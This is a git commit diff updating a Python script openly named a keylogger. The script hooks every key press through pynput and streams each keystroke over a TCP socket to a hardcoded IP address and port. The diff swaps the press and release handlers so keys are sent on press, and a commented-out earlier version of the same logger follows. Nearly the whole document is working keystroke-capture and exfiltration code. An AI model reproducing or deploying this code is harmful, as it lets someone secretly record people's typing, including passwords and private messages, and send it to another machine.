Update 'Server/KEY LOGGER - Mirror - KEYBOARD- press.py'

This commit is contained in:
CactiChameleon9 2020-12-15 07:43:42 +00:00
parent ff228b75ae
commit d0dac60704

View File

@ -23,7 +23,7 @@ BUFFER_SIZE = 128 # send 4096 bytes each time step
host = "10.4.27.243"
# the ip address or hostname of the server, the receiver
# the port, let's use 5001
port = 10003
port = 10001
# create the client socket
s = socket.socket()
@ -35,12 +35,12 @@ print("[+] Connected.")
#-----------------------------------------------------------
def on_release(key):
def on_press(key):
dataToSend = (('{}'.format(key)).replace("'", ""))
dataToSendBytes = dataToSend.encode()
s.sendall(dataToSendBytes)
def on_press(key):
def on_release(key):
print("\n")
@ -52,3 +52,68 @@ with keyboard.Listener(on_press = on_press, on_release = on_release) as listener
#-----------------------------------------
###Old, not based of working release
# import socket
# import os
# from tkinter import *
# from pynput import keyboard
# #window = Tk()
# #label = Label(window, text= 'What is the IP')
# #entry = Entry(browser_window, width=200)
# #entry.insert(END, IP)
# #label.pack()
# #entry.pack()
# SEPARATOR = "<SEPARATOR>"
# BUFFER_SIZE = 128 # send 4096 bytes each time step
# host = "10.4.27.243"
# # the ip address or hostname of the server, the receiver
# # the port, let's use 5001
# port = 10001
# #IPfile = open("IPfile.txt", "w")
# #text_file.write("¬")
# #text_file.close()
# # create the client socket
# s = socket.socket()
# print(f"[+] Connecting to {host}:{port}")
# s.connect((host, port))
# print("[+] Connected.")
# #-----------------------------------------------------------
# def on_press(key):
# dataToSend = ""
# dataToSend.write(('{}'.format(key)).replace("'", ""))
# sendfile()
# dataToSendBytes = dataToSend.encode()
# s.sendall(dataToSendBytes)
# with keyboard.Listener(
# on_press = on_press) as listener:
# listener.join()
# #-----------------------------------------